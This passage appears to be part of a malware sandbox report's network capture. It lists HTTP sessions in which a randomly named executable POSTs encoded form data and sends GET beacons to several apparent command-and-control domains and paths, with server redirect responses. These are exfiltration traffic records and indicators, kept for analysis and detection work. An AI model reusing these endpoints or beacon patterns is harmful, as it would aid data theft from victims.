                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bearableguy.net
                                                                                Origin: http://www.bearableguy.net
                                                                                Referer: http://www.bearableguy.net/37uf/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6f 61 78 6b 44 34 50 4b 6e 63 59 52 44 69 6f 4d 64 63 53 7a 32 75 64 63 79 59 49 7a 34 63 54 63 6f 52 68 46 53 31 73 70 43 41 4b 32 63 46 33 57 51 35 59 4f 35 4c 7a 32 6a 4a 39 41 53 39 63 6c 68 74 5a 77 7a 30 53 67 2f 37 5a 4c 51 45 36 79 39 6e 4b 32 33 44 49 6c 6e 67 50 36 4a 30 2b 6b 66 2b 77 52 46 65 33 73 4b 6c 53 34 4a 4d 6c 34 42 69 70 75 4f 52 71 6c 49 37 68 47 38 68 66 4b 2f 2f 75 4f 41 4b 78 62 73 6c 5a 78 5a 2f 75 73 48 4e 6b 4a 38 73 46 4e 59 2f 32 2b 64 79 51 4a 6b 67 48 58 37 46 41 4b 46 6c 33 58 59 6e 6d 73 78 74 47 44 55 78 57 59 44 33 41 77 73 31 48 70 51 78 6f 55 75 31 30 75 47 5a 58 64 61 53 51 6d 50 71 71 4a 54 4d 3d
                                                                                Data Ascii: Y8i=UoaxkD4PKncYRDioMdcSz2udcyYIz4cTcoRhFS1spCAK2cF3WQ5YO5Lz2jJ9AS9clhtZwz0Sg/7ZLQE6y9nK23DIlngP6J0+kf+wRFe3sKlS4JMl4BipuORqlI7hG8hfK//uOAKxbslZxZ/usHNkJ8sFNY/2+dyQJkgHX7FAKFl3XYnmsxtGDUxWYD3Aws1HpQxoUu10uGZXdaSQmPqqJTM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.4500353.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:44.018862963 CET10871OUTPOST /37uf/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bearableguy.net
                                                                                Origin: http://www.bearableguy.net
                                                                                Referer: http://www.bearableguy.net/37uf/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6f 61 78 6b 44 34 50 4b 6e 63 59 52 44 69 6f 4d 64 63 53 7a 32 75 64 63 79 59 49 7a 34 63 54 63 6f 52 68 46 53 31 73 70 43 49 4b 33 75 4e 33 58 33 74 59 4e 35 4c 7a 71 54 4a 34 41 53 39 64 6c 68 31 6a 77 7a 34 73 67 39 7a 5a 49 78 6b 36 6d 63 6e 4b 68 6e 44 49 34 33 67 4f 6e 5a 30 52 6b 66 76 35 52 46 4f 33 73 4b 6c 53 34 50 67 6c 73 45 4f 70 39 2b 52 70 73 6f 36 67 43 38 68 33 4b 2f 48 55 4f 41 47 62 62 63 46 5a 79 35 50 75 72 30 6c 6b 55 73 73 39 64 49 2b 6c 2b 64 2b 54 4a 6b 39 32 58 2b 35 36 4b 48 35 33 62 63 4f 74 39 31 5a 4e 53 6c 78 4b 4c 7a 44 43 7a 63 31 34 6d 78 5a 4d 45 37 56 49 34 6e 5a 49 5a 36 50 47 37 76 32 75 4c 33 6b 48 43 69 44 72 68 58 38 68 42 79 64 69 48 76 43 33 4f 30 6c 4d 68 56 73 5a 50 44 32 30 48 5a 71 43 46 52 72 50 31 2b 39 72 44 6e 4a 2f 56 4b 51 31 31 78 38 75 68 46 77 43 6b 52 4e 74 6c 76 4d 36 41 31 57 53 69 6b 46 44 41 58 4b 73 49 74 79 57 6a 39 2f 63 69 65 32 52 45 38 2f 74 6b 4c 4f 4a 37 4c 30 53 45 38 68 74 73 48 53 4e 4e 2f 35 6f 42 49 6d 31 68 72 [TRUNCATED]
                                                                                Data Ascii: Y8i=UoaxkD4PKncYRDioMdcSz2udcyYIz4cTcoRhFS1spCIK3uN3X3tYN5LzqTJ4AS9dlh1jwz4sg9zZIxk6mcnKhnDI43gOnZ0Rkfv5RFO3sKlS4PglsEOp9+Rpso6gC8h3K/HUOAGbbcFZy5Pur0lkUss9dI+l+d+TJk92X+56KH53bcOt91ZNSlxKLzDCzc14mxZME7VI4nZIZ6PG7v2uL3kHCiDrhX8hBydiHvC3O0lMhVsZPD20HZqCFRrP1+9rDnJ/VKQ11x8uhFwCkRNtlvM6A1WSikFDAXKsItyWj9/cie2RE8/tkLOJ7L0SE8htsHSNN/5oBIm1hrfHzfrLp1czlouDJYQJ4Mmg4AFt4WjULrI0xQUvbkizkuW4pUCSx+fGurPbH0RUMJ1By7Sf3uBbR0e2KUgqR09Wak/kuwLIt3jlNgB8Wy4PojNa0qOOaOaI2bFNAI1xZWD4uhoUHO9sEo8MN8S28mxg1c+iEmiGw4CAcuIHkNFFlwxFejq12VKNXW3ilzQvRtNPJCV5gPt9lrUBNpWqbjaFYY3D7Uzb90IcN9r7YLKhf9MSKuoaXexjclRW9mdY2uEvnctqSOpdaFxPi/NMsfFasOIA/5Cj8uQvrB+T0Pfsgp/NHEMJEx5LmJs4MmVisUFrUN+bLlyKGXUgB70PBVMrxt3iEn4hblOsjCB3WUPD9tBV/6Qvu4P+A9csowaY9nu1jngW+6o44xJT6Jw/Ri9Zei8IJaqw4wGODPDxUdBIFDalymXguko4MdNg7qFVY4rbqt4jFrhjO4sJADKY6jQ/h2Q2t3ybbDnwZhCzwCPUiGBzdCnZw2H8A/dybJibFTooFgEExl9PBnwMCtBOXmDgyUSfnCBclPeg19nHz7T6/2IjxnCAtQv3G+6o0BVuBa2KU5zeNTgDppnmz4tMjpwwsh0IeuO+rEvxoiMfPs+g/e0LC1eVVEvGq7bDoWAiqi+x33RXFAsOwqfcAJoDbg+NKb5nd/dKvZcs [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.4500363.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:47.409506083 CET504OUTGET /37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bearableguy.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:37:48.045371056 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:37:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 71 79 52 6e 30 74 4b 42 6c 38 65 65 44 71 44 4c 66 6b 42 33 30 57 55 43 67 67 6e 2b 38 6f 6b 4b 6f 6c 42 51 51 55 4f 6e 69 67 6b 67 61 39 78 61 42 46 66 64 65 7a 69 6d 32 39 77 41 31 74 2b 30 31 31 30 38 42 30 70 6d 50 4c 62 5a 41 49 55 74 4c 33 37 32 32 50 43 78 6c 35 52 6d 64 38 48 7a 75 66 35 4d 78 61 33 6e 34 68 59 30 4c 6f 58 35 42 50 70 69 36 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.4500373.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:53.140146971 CET766OUTPOST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 64 79 68 71 47 55 77 73 69 6e 57 62 7a 46 67 78 48 49 63 4d 58 49 52 76 39 77 57 45 70 2b 68 49 6e 63 52 4b 2f 47 42 70 45 39 33 6d 34 43 43 65 64 70 4a 41 33 4b 59 6a 36 46 73 57 55 31 38 6a 4c 47 70 51 47 34 54 62 4f 5a 2f 6a 50 77 48 67 4e 4d 66 6c 61 61 4d 74 39 54 75 39 73 64 56 63 33 67 6c 57 4b 49 63 34 52 48 46 79 68 2b 49 68 2f 36 74 39 4f 66 30 65 74 44 6c 38 30 6d 48 56 79 4c 65 51 51 5a 65 31 35 54 4d 59 65 44 4e 2f 74 30 68 52 65 41 76 36 67 6b 39 35 6a 45 56 7a 56 47 6e 72 34 6d 65 68 64 65 66 31 4e 62 35 64 6a 2b 2f 4c 47 41 3d 3d
                                                                                Data Ascii: Y8i=z8RVxp9ax2A/dyhqGUwsinWbzFgxHIcMXIRv9wWEp+hIncRK/GBpE93m4CCedpJA3KYj6FsWU18jLGpQG4TbOZ/jPwHgNMflaaMt9Tu9sdVc3glWKIc4RHFyh+Ih/6t9Of0etDl80mHVyLeQQZe15TMYeDN/t0hReAv6gk95jEVzVGnr4mehdef1Nb5dj+/LGA==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.4500383.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:55.699189901 CET786OUTPOST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 65 57 64 71 56 33 59 73 67 48 57 63 76 56 67 78 4e 6f 63 49 58 49 64 76 39 30 4f 55 70 4d 46 49 70 64 68 4b 2b 45 35 70 48 39 33 6d 73 53 43 62 44 5a 4a 4c 33 4c 6b 64 36 46 41 57 55 31 6f 6a 4c 45 68 51 47 72 37 59 55 70 2f 62 55 67 48 69 56 73 66 6c 61 61 4d 74 39 54 71 58 73 64 64 63 30 51 31 57 49 71 30 37 63 6e 46 78 69 2b 49 68 70 4b 74 78 4f 66 30 38 74 42 42 61 30 6b 50 56 79 50 61 51 51 4e 4b 32 33 54 4d 53 54 6a 4d 63 2b 6b 46 5a 59 77 79 6f 6f 69 55 5a 68 30 64 63 5a 67 32 78 70 58 2f 32 50 65 37 47 51 63 77 70 75 39 43 43 64 45 72 71 64 41 46 49 6a 43 44 58 59 6d 78 55 33 35 75 33 33 34 6f 3d
                                                                                Data Ascii: Y8i=z8RVxp9ax2A/eWdqV3YsgHWcvVgxNocIXIdv90OUpMFIpdhK+E5pH93msSCbDZJL3Lkd6FAWU1ojLEhQGr7YUp/bUgHiVsflaaMt9TqXsddc0Q1WIq07cnFxi+IhpKtxOf08tBBa0kPVyPaQQNK23TMSTjMc+kFZYwyooiUZh0dcZg2xpX/2Pe7GQcwpu9CCdErqdAFIjCDXYmxU35u334o=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.4500393.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:37:58.434643984 CET10868OUTPOST /kgqw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.funddata-x.net
                                                                                Origin: http://www.funddata-x.net
                                                                                Referer: http://www.funddata-x.net/kgqw/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 7a 38 52 56 78 70 39 61 78 32 41 2f 65 57 64 71 56 33 59 73 67 48 57 63 76 56 67 78 4e 6f 63 49 58 49 64 76 39 30 4f 55 70 4d 4e 49 70 76 70 4b 2f 6a 74 70 47 39 33 6d 76 53 43 61 44 5a 4a 73 33 4b 4d 42 36 46 63 67 55 32 51 6a 4c 6e 35 51 58 4b 37 59 61 5a 2f 62 4c 77 48 6a 4e 4d 66 38 61 61 64 6b 39 54 36 58 73 64 64 63 30 53 64 57 4d 34 63 37 61 6e 46 79 68 2b 49 31 2f 36 73 75 4f 66 4d 47 74 42 46 4b 30 58 58 56 79 72 2b 51 57 2b 79 32 2f 54 4d 63 66 44 4d 36 2b 6b 34 48 59 77 65 61 6f 6d 64 4f 68 32 42 63 50 42 33 57 34 6e 6e 4f 5a 34 36 66 4d 66 41 4e 76 2f 79 75 54 46 44 46 56 69 49 54 38 51 44 2f 43 42 42 59 74 5a 57 54 68 63 54 32 38 35 63 6c 2f 56 42 43 63 6e 78 55 78 58 61 64 31 33 46 51 49 44 45 48 31 76 39 58 38 57 4b 35 5a 7a 58 67 65 31 68 69 37 43 47 49 4b 36 4f 6c 41 62 6b 53 52 4e 73 55 52 56 39 50 75 71 47 6a 62 57 6d 77 43 6c 59 42 59 38 56 77 53 50 33 55 58 72 2b 6e 31 63 68 4f 37 67 49 32 66 33 33 69 65 67 4e 4b 6d 67 6f 54 30 56 64 6a 6e 34 32 63 4f 54 53 4b 35 59 [TRUNCATED]
                                                                                Data Ascii: Y8i=z8RVxp9ax2A/eWdqV3YsgHWcvVgxNocIXIdv90OUpMNIpvpK/jtpG93mvSCaDZJs3KMB6FcgU2QjLn5QXK7YaZ/bLwHjNMf8aadk9T6Xsddc0SdWM4c7anFyh+I1/6suOfMGtBFK0XXVyr+QW+y2/TMcfDM6+k4HYweaomdOh2BcPB3W4nnOZ46fMfANv/yuTFDFViIT8QD/CBBYtZWThcT285cl/VBCcnxUxXad13FQIDEH1v9X8WK5ZzXge1hi7CGIK6OlAbkSRNsURV9PuqGjbWmwClYBY8VwSP3UXr+n1chO7gI2f33iegNKmgoT0Vdjn42cOTSK5YnUxSx1wLdc2K9k62RKJRp9rsa6NxdiH4sc//ZEX1h/h6mVQoAFDL6ZZzdSe9jVli3mUn0khE6q+O5FuovIdFQdcc/LENkROCkXz2JVwn3S0pFcswBiSJHMtyDQjbQpTee01GB8tB5hTsVsLaxCtpIlc/iWhaQvTpLNVHodGYaAnXv4xZg1j2AgttH6Nz/Nc99WJyeiBsI2171CA+fc1geUxy3MgKyUca73GUVhIorEqabSS/2JjXwYVsnLKmnIEVrBHjSXgWBPmRnTdGQ+LjD5FJCzsBfzjnuQJJ66HMHs71CROaRv7f/l0h+p5S9dxg3420VUrYbS9uDLCBHdnOOg3Kdq5G4VxqobLVI0OQzb166StS+IGXTABErmjx+Hw0iFojF6tRarNh6KhyLkLy10koBJkoQKVWKl555W1zpaOXuKVlZYnAcuFtqmvDPTf7rntJoDEz+3ccUpV7UMe8+OeFttWfhGmkn61Rin6WMR+D/lyPLT5lUD/VWf2sAypdf2Mqcm0yUXet1mPK+TNFG1NIbbvWUzp+h+RRMchIFcsrg0B1lJP7hG9Ppl38TXY+xf+59V6qaT5LfaweM/htA1M3hxMWlkSdPcr+nGJBUTZnXB3PVMy6LiN1dyXLFGcOCaHI+Vm03Yxb6i6QcV0cIx5cz/8E6feR83 [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.4500403.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:00.968388081 CET503OUTGET /kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.funddata-x.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:01.586008072 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:01 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 38 69 3d 2b 2b 35 31 79 64 56 44 32 47 6f 31 4b 78 68 61 50 33 4d 56 6f 30 2b 68 33 47 30 61 4d 4b 38 56 56 6f 70 78 78 58 79 56 69 76 78 30 37 36 4a 35 37 6c 46 69 4c 4a 71 2f 6f 31 36 52 42 4b 70 35 6b 4e 6b 38 30 30 30 48 53 48 4d 7a 4c 57 35 74 59 39 76 73 61 49 2f 6d 44 69 4b 73 54 64 2f 55 50 6f 5a 6b 37 32 2b 6c 68 2b 35 49 39 78 46 56 46 36 77 39 56 41 41 3d 26 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.4500413.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:06.633554935 CET754OUTPOST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 55 35 67 31 44 56 6d 33 38 2b 57 4b 6f 4b 68 58 4c 6d 4d 63 69 31 46 72 2b 42 71 6d 37 32 71 6c 41 5a 58 44 51 55 78 66 32 6f 53 56 53 6a 48 49 4d 69 36 4e 44 56 43 69 56 56 6e 78 4f 6a 5a 2f 77 77 55 53 43 71 4e 79 36 4a 5a 58 63 6a 49 48 77 52 6f 59 2f 4d 36 52 4a 5a 6e 41 52 66 33 4f 73 4b 6d 48 64 63 2b 51 64 63 4f 4d 54 35 50 4b 55 75 52 5a 73 68 59 6b 45 77 71 72 36 34 66 38 65 4c 77 44 4a 45 61 56 36 57 4b 71 65 68 57 41 35 78 6a 76 2f 55 6c 6d 42 32 31 49 31 68 72 61 6c 34 54 44 53 4c 2b 76 69 41 50 65 36 7a 73 4b 5a 36 5a 4b 4a 77 3d 3d
                                                                                Data Ascii: Y8i=UjrhHaQBT317U5g1DVm38+WKoKhXLmMci1Fr+Bqm72qlAZXDQUxf2oSVSjHIMi6NDVCiVVnxOjZ/wwUSCqNy6JZXcjIHwRoY/M6RJZnARf3OsKmHdc+QdcOMT5PKUuRZshYkEwqr64f8eLwDJEaV6WKqehWA5xjv/UlmB21I1hral4TDSL+viAPe6zsKZ6ZKJw==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.4500423.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:09.183274984 CET774OUTPOST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 56 59 77 31 50 57 4f 33 30 2b 57 4a 30 36 68 58 41 47 4d 59 69 31 5a 72 2b 41 66 2b 36 41 61 6c 41 34 6e 44 52 56 78 66 78 6f 53 56 56 54 48 48 43 43 36 53 44 56 48 66 56 55 62 78 4f 6a 64 2f 77 77 6b 53 46 5a 56 7a 6f 70 5a 56 54 44 49 42 74 42 6f 59 2f 4d 36 52 4a 5a 69 72 52 66 2f 4f 73 36 57 48 63 2f 6d 58 65 63 4f 50 53 35 50 4b 44 2b 52 64 73 68 59 47 45 31 4b 52 36 2b 44 38 65 4f 55 44 49 51 4f 57 7a 57 4b 57 54 42 58 77 70 77 69 62 35 6e 68 73 44 33 46 39 34 6a 33 57 70 65 43 5a 44 36 66 34 77 41 72 74 6e 30 6c 2b 55 35 6b 44 53 78 72 43 4f 56 50 58 53 48 68 30 61 73 5a 4d 32 72 66 72 56 39 4d 3d
                                                                                Data Ascii: Y8i=UjrhHaQBT317VYw1PWO30+WJ06hXAGMYi1Zr+Af+6AalA4nDRVxfxoSVVTHHCC6SDVHfVUbxOjd/wwkSFZVzopZVTDIBtBoY/M6RJZirRf/Os6WHc/mXecOPS5PKD+RdshYGE1KR6+D8eOUDIQOWzWKWTBXwpwib5nhsD3F94j3WpeCZD6f4wArtn0l+U5kDSxrCOVPXSHh0asZM2rfrV9M=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.4500433.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:11.738184929 CET10856OUTPOST /5hlj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.s9gzg9.vip
                                                                                Origin: http://www.s9gzg9.vip
                                                                                Referer: http://www.s9gzg9.vip/5hlj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 55 6a 72 68 48 61 51 42 54 33 31 37 56 59 77 31 50 57 4f 33 30 2b 57 4a 30 36 68 58 41 47 4d 59 69 31 5a 72 2b 41 66 2b 36 44 36 6c 42 4c 76 44 51 32 5a 66 77 6f 53 56 57 54 47 41 43 43 36 62 44 56 2f 62 56 55 58 4c 4f 68 31 2f 71 52 45 53 45 73 68 7a 69 70 5a 56 52 44 49 45 77 52 70 41 2f 4d 71 56 4a 61 4b 72 52 66 2f 4f 73 38 61 48 61 73 2b 58 53 38 4f 4d 54 35 50 38 55 75 52 31 73 6c 30 38 45 31 4f 42 39 4e 62 38 65 76 6f 44 45 47 79 57 72 47 4b 75 64 68 58 6f 70 31 36 45 35 6b 45 54 44 33 77 6d 34 68 72 57 35 66 6d 48 58 35 57 6a 6e 7a 6a 78 36 6d 46 48 64 34 63 47 53 68 44 4a 65 46 48 75 45 30 42 41 5a 66 45 38 74 6f 33 77 44 49 46 4d 73 75 41 47 52 70 66 54 46 77 4e 30 66 4d 6d 49 47 30 4b 75 68 6b 72 39 36 37 4a 35 4c 52 6f 52 75 50 48 66 66 33 46 76 57 55 64 55 31 4a 46 35 68 67 76 49 49 62 7a 54 49 59 62 4a 75 64 57 33 65 75 76 48 79 35 6e 31 37 59 51 50 52 56 2f 6f 5a 78 4a 78 48 61 6a 32 4e 63 75 44 4a 50 79 4d 58 4e 4f 50 49 6d 77 42 59 6e 73 6f 38 6d 48 52 44 6c 35 76 75 79 [TRUNCATED]
